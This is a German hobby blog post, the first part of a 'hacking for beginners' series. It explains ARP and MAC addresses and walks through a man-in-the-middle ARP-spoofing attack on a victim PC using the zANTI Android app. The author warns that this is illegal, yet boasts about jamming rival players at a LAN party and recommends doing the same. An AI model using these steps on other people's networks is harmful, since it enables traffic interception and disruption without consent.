Patrick</p> </div></div></div><div class="field field-name-field-tags field-type-taxonomy-term-reference field-label-above"><div class="field-label">Tags:&nbsp;</div><div class="field-items"><div class="field-item even" rel="dc:subject"><a href="/?q=taxonomy/term/5" typeof="skos:Concept" property="rdfs:label skos:prefLabel" datatype="">Hacken für Anfänger</a></div></div></div> Fri, 29 Jan 2016 15:04:07 +0000 Patrick 23 at https://archiv.patricksworld.de/patricksworld.bplaced.net https://archiv.patricksworld.de/patricksworld.bplaced.net/?q=node/23#comments "Hacken" für Anfänger Teil 1 https://archiv.patricksworld.de/patricksworld.bplaced.net/?q=node/22 <div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even" property="content:encoded"><p><img src="bilder/robo.jpg" alt="" /></p> <p><b><span style="font-size: larger;"><strong>Hallo liebe Freunde des gepflegten Internetblogs.</strong></span></b></p> <p>Heute und auch die nächsten Wochen, soll es ausnahmsweise mal über<br /> PC's gehen. Vielleicht hat der eine oder andere von euch einmal<br /> Mr. Robot gesehen. Im Großen und Ganzen geht es um einen Hacker<br /> der sich gegen einen der größten Konzerne stellt. Wer die Serie<br /> noch nicht gesehen hat, sollte das jetzt nachholen.</p> <p>Doch ich will euch nicht mit so einer schnöden Serie langweilen.<br /> Nein. Ich nehme wie immer meinen Bildungsauftrag war. Die Serie<br /> zeigt den Hacker, wie er in Netzwerke einbricht und auch sonst<br /> so den einen oder anderen hackt. Leider lassen sie den unwissenden<br /> Zuschauer im dunkeln tappen und erklären nicht einmal wie er das macht.</p> <p>Im TV sieht das immer so einfach aus und vielleicht fragt sich dann<br /> auch der Eine oder Andere, ob das wirklich so einfach geht.</p> <p>Und vorab. Jap. Jedes 10 Jährige Kind mit einem Smartphone könnte die<br /> meisten Sachen selbstständig machen.<br /> Es gibt nur <strong>3 Bedingungen</strong> die ihr erfüllen müsst.</p> <p><strong>1. Kauft euch einen schwarzen Hoodie.</strong> Denn den besitzt jeder seriöse<br /> Hacker. Auch ich muss den immer zuerst anziehen, bevor ich eine<br /> Schwachstelle nutze. Daran erkennt man auch stets die Hacker. Entweder am<br /> schwarzen Hoodie oder an der "Guy Fawkes" Maske.<br /> Da aber nur die Anonymous die Maske benutzen, könnt ihr euch eher auf<br /> den schwarzen Hoodie verlassen.</p> <p>2. Ihr bestitz ein Smartphone (ich meine damit ein richtiges mit Android<br /> und Rootzugriff) oder Laptop oder irgendein gerät mit Bildschirm.<br /> Vermutlich würde sogar ein gerooteter Android-TV funktionieren.</p> <p>3. <strong>Lest regelmäßig meinen Blog</strong>. Denn ich versuche euch hier wirklich<br /> Kindgerecht ein paar Grundlagen zu erklären.</p> <p><strong><span style="font-size: larger;">An dieser Stelle will ich euch nochmal ins Gewissen reden.</span></strong></p> <p>Das Spionieren und Manipulieren von Netzwerken ist kein Kavaliersdelikt.<br /> Genauso wenig Identitätsdiebstahl. Geht also bitte sicher, das ihr in<br /> eurem eigenen Netzwerk unterwegs seid und das ihr nicht euren Mitbewohner<br /> oder ähnliches beim pornostreamen stört. Denn der kann auch ganz schnell<br /> mal wütend werden. Außerdem steht ihr ab jetzt unter Generalverdacht.</p> <p>Denn jedes mal, wenn etwas nicht funktioniert wird man euch vorwerfen ihr<br /> hättet schon wieder die Finger im Spiel gehabt. Und nur zur Info. Ich war<br /> nur einmal im Wohnheim für ne kleine aber witzige Störung verantwortlich.</p> <p>Mein Ziel ist es euch zu zeigen, wie einfach es geht Netzwerke zu manipulieren<br /> und Sicherheitslücken aus zu nutzen, damit ihr euch der Gefahr in fremden<br /> Netzwerken und auf irgendwelchen zwielichtigen Internetseiten im Klaren seit.<br /> Außerdem wird nach den nächsten Wochen der Ein oder Andere sich vielleicht doch<br /> nochmal überlegen, ob er wirklich sein geliebtes Windows unbedingt braucht<br /> oder ob er sich doch mit meinem geliebten Linux oder Apple (das liebe ich nicht)<br /> anfreunden kann.</p> <p>Nach den nächsten Wochen, werdet ihr mit Sicherheit keine Hacker werden. Im besten<br /> Fall sind wir dann Scriptkiddies in schwarzen Hoodies. Vorab schonmal einen kleinen<br /><strong><span style="font-size: larger;">Überblick was wir gemeinsam erarbeiten werden.</span></strong></p> <p><em>-Netzwerke Manipulieren + Daten abfangen und mitschneiden<br /> -in Netzwerke eindringen<br /> -RFID-Karten (wie z.B. unsere Mensaar Karte) knacken und kopieren<br /> -unserer eigenen kleinen Trojaner erstellen<br /> -PC's inkl. Webcam kontrollieren</em><br /> -Wenn ihr noch wünsche über irgendwas spezielles habt, dann schreibt<br /> das bitte unten in den Kommentaren. Dann zeige ich (falls ich dazu in der<br /> lage bin) Euch natürlich auch gerne andere "Hacks".</p> <p>Ich hoffe das überzeugt euch in den nächsten Wochen, die Windowskisten platt zu machen.</p> <p><strong><span style="font-size: larger;">Also lets go. Hoodie an. Es geht ans Eingemachte.</span></strong></p> <p>Wir beginnen mit einer kleinen Runde zum Erwärmen. Netzwerkgrundlagen und<br /> Manipulation.<br /> Grundsätzlich funktioniert das mit allen Betriebssystem. Und sobald jemand Interresse<br /> hat, zeuge ich euch auch wie man das am PC macht. Fragt einfach im Kommentarfeld nach.<br /> Da wir aber heute schnelle Erfolge wünschen, fangen wir mit einer kleinen Handyapp an.<br /> Denn die nimmt uns eigentlich alles ab. Dennoch machen wir etwas Theorieunterricht.</p> <p>Ich lege mit Absicht keinen großen Wert, auf die vollständige technische Korrektheit<br /> um es so einfach wie es geht zu erklären. Also an alle Klugscheißer vor weg. Das<br /> ist hier für Kleinkinder und blutige Amateure.</p> <p><strong><span style="font-size: larger;">Wie funktioniert ein Netzwerk?</span></strong></p> <p><strong>MAC-Adresse</strong> (Media-Access-Control-Adresse):</p> <p>Grundsätzlich besitzt jede Netzwerkkarte eine Hersteller Nummer. Diese nennt man<br /> MAC-Adresse (Media-Access-Control-Adresse). Also egal ob ihr eine Ethernetdose<br /> am PC habt oder ein Wlanstick. Diese Nummer ist grundsätzlich immer eindeutig und<br /> vom Hersteller fest vergeben. Diese sieht dann z.B: so aus: 00:80:41:ae:fd:7e</p> <p><strong>Der Router / Gateway</strong></p> <p>Ihr habt ein Gerät was euch ins Internet bringt und den Netzwerkverkehr regelt.<br /> Dieser überprüft die Geräte im Netzwerk. Vergibt eine IP-Adresse und sendet euch<br /> die Pakete (Daten). Die Daten von dem Router werden immer an die MAC-Adresse von<br /> eurem PC geschickt. Grundsätzlich werden die Gateway's in einer Art Tabelle gespeichert.<br /> Diese nennt man Address Resolution Protocol (ARP).</p> <p>Ich entschuldige mich schon vorab für meine zeichnerischen Fähigkeiten. Ich beherrsche<br /> das Zeichnen ähnlich gut wie die deutsche Rechtschreibung. Aber dennoch versteht man<br /> glaub ich meistens, was damit gemeint ist. Hier seht ihr ein Netzwerk, wie es normaler<br /> Weise funktionieren soll.</p> <p><br /><br /><br /><br /><img src="bilder/Mitm.png" alt="normal" /></p> <p><br /><br /><br /></p> <p>Das Problem an dieser Stelle ist, das die MAC-Adresse vom jeweiligen Betriebssystem<br /> übermittelt wird und nicht Hardwareseitig. Also lässt diese sich kinderleicht verändern.<br /> Und das ebenfalls unter jedem Betriebssystem.</p> <p>Das Ziel mit unserem Angriff ist es uns jetzt dazwischen zu schalten. Also zwischen den<br /> Router und dem PC. Wir sagen also dem PC Das wir auch ein Gateway sind. Und dem Router<br /> täuschen wir vor, das wir die gleiche MAC-Adresse haben, wie der Opfer-PC.</p> <p>Das nennt man <strong>Man-in-the-Middle-Angriff</strong> (kurz: MITM-Angriff). Die Methode ist uralt,<br /> aber immernoch sehr effektiv.</p> <p>Das heißt also. Jeglicher unverschlüsselter Netzwerkverkehr geht durch unseren Rechner.<br /> Das bedeutet gleichzeitig, das wir uns ansehen können was der andere gerade macht.<br /> Und alle Passwörter die unverschlüsselt übermittelt werden, können dadurch mitgelesen werden.<br /> außerdem ist es auch möglich unverschlüsselte Sitzungen zu übernehmen. Natürlich können wir<br /> auch beliebig die Seiten bearbeiten und theoretisch unseren Schadcode einfügen. Doch das ein<br /> anderes Mal. Heute ersetzten wir einfach nur alle Bilder auf der angezeigten Webseite.<br /><br /><br /><br /><br /><img src="bilder/Mitm2.png" alt="MITM" /><br /><br /><br /><br /></p> <p><strong><span style="font-size: larger;">So viel zur Theorie. Ab zur Praxis. </span></strong><br /><br /><br /><br /> In meinem Netzwerk habe ich über Virtualbox einen Windows XP PC im einsatzt. Demnächst<br /> werde ich vielleicht mal einen ApplePC dran glauben lassen. Wie gesagt. Das funktioniert<br /> bei jedem Betriebssystem. Da kann das "gute" alte Win XP nichts dafür.</p> <p>Ihr benötigt auf jeden Fall ein gerootetes Android Gerät.<br /> Ladet euch die App Zanti 2.2 <a href="https://www.zimperium.com/zanti-mobile-penetration-testing">hier</a> runter<br /> und installiert sie euch auf euer Telefon.</p> <p>Damit ihr euch die IP Adresse von eurem PC anzeigen könnt öffnet einfach eine Konsole.</p> <p>Unter Windows kann man ipconfig eingeben. Unter linux (und ich glaube auch bei MacOSX)<br /> einfach ifconfig eingeben.<br /> Eure Gateways ("Router") könnt ihr euch mit arp -a anzeigen lassen.</p> <p>Im folgenden Bild seht ihr die Ausgabe ohne Manipulation.<br /><br /><br /><br /></p> <p><img src="bilder/arp1.png" alt="" /></p> <p><br /><br /><br /></p> <p>Jetzt starten wir die App.</p> <p>Ihr solltet natürlich mit eurem Wlan verbunden sein ;)</p> <p>Akzeptiert die AGB's und könnt mit dem scannen starten.</p> <p><br /><br /><br /><img src="bilder/Screenshot_20160124-124920.png" alt="" /></p> <p><br /><br /><br /></p> <p>Nun seht ihr bereits die Geräte im Netzwerk.<br /> - Einfach das Opfer auswählen.<br /> - Man in the Middle auswählen.<br /> - Schalter auf On legen.<br /> - Bild zum Ersetzten auswählen.</p> <p><img src="bilder/zanti.png" alt="" /></p> <p><br /><br /><br /><br /></p> <p>OK. Beim Opfer sieht das ganze dann so aus:</p> <p><br /><br /><br /><img src="bilder/arp2.png" alt="hacked" /></p> <p><br /><br /><br /></p> <p>Wie ihr oben erkennen könnt. Sind jetzt auch zwei Gateways in der ARP-Tabelle zu<br /> finden.</p> <p>OK. Das ist jetzt nur ein harmloses Bild was wir ausgetauscht haben. Wie gesagt. Es<br /> verdeutlicht nur, das wir jede Seite manipulieren können. Und somit auch Schadcode<br /> einfügen können. Dazu kommen wir aber erst später meine jungen Schüler.</p> <p>Also. Wenn ihr Fragen habt, dann ab in die Kommentare. Ich Zeige euch bei Interrese<br /> gerne wie man das am PC genauso hinbekommt. Aber für später müssen wir uns eh alle<br /> gemeinsam mit Linux grundlagen befassen. Deswegen Denke ich für heute reicht das zu.</p> <p>Und denkt dran. So witzig wie das ist. Macht so ein Quatsch nur bei euch zu Hause,<br /> auch wenn das Problemlos genauso gut an der Uni funktioniert.</p> <p>Was Übrigens noch eine kleine Empfehlung ist.<br /> Bei Lanpartys kommt das Richtig gut. Denn ich wollte mein Team ein Wenig unterstützen.<br /> Da es mir aber an LOL Skills fehlt, hab ich halt nach und nach immer wieder einzellne<br /> Leute aus dem gegnerischen Team auf Eis gelegt. Und ihr habt keine Ahnung wie wütend<br /> Zocker werden können, wenn es laggt. Es war wirklich wie ein Konzert aus Maulerei.<br /> Und ihr seid dabei auch noch der Dirigent. </p> <p><br /><br /><br /><img src="bilder/lanparty.png" alt="lanparty" /><br /><br /><br /></p> <p>...Phantastisch...</p> <p>Kleiner Tipp. Nehmt immer den der sich am lautesten aufregt. Denn der ist dann schon vor<br /> Wut aufgestanden. In dem Fall wars der mit dem Apple Laptop.</p> <p>Bis die Tage liebe Fans</p> <p>MFG Patrick</p> </div></div></div><div class="field field-name-field-tags field-type-taxonomy-term-reference field-label-above"><div class="field-label">Tags:&nbsp;</div><div class="field-items"><div class="field-item even" rel="dc:subject"><a href="/?q=taxonomy/term/5" typeof="skos:Concept" property="rdfs:label skos:prefLabel" datatype="">Hacken für Anfänger</a></div></div></div> Sun, 24 Jan 2016 16:27:51 +0000 Patrick 22 at https://archiv.patricksworld.de/patricksworld.bplaced.net https://archiv.patricksworld.de/patricksworld.bplaced.net/?q=node/22#comments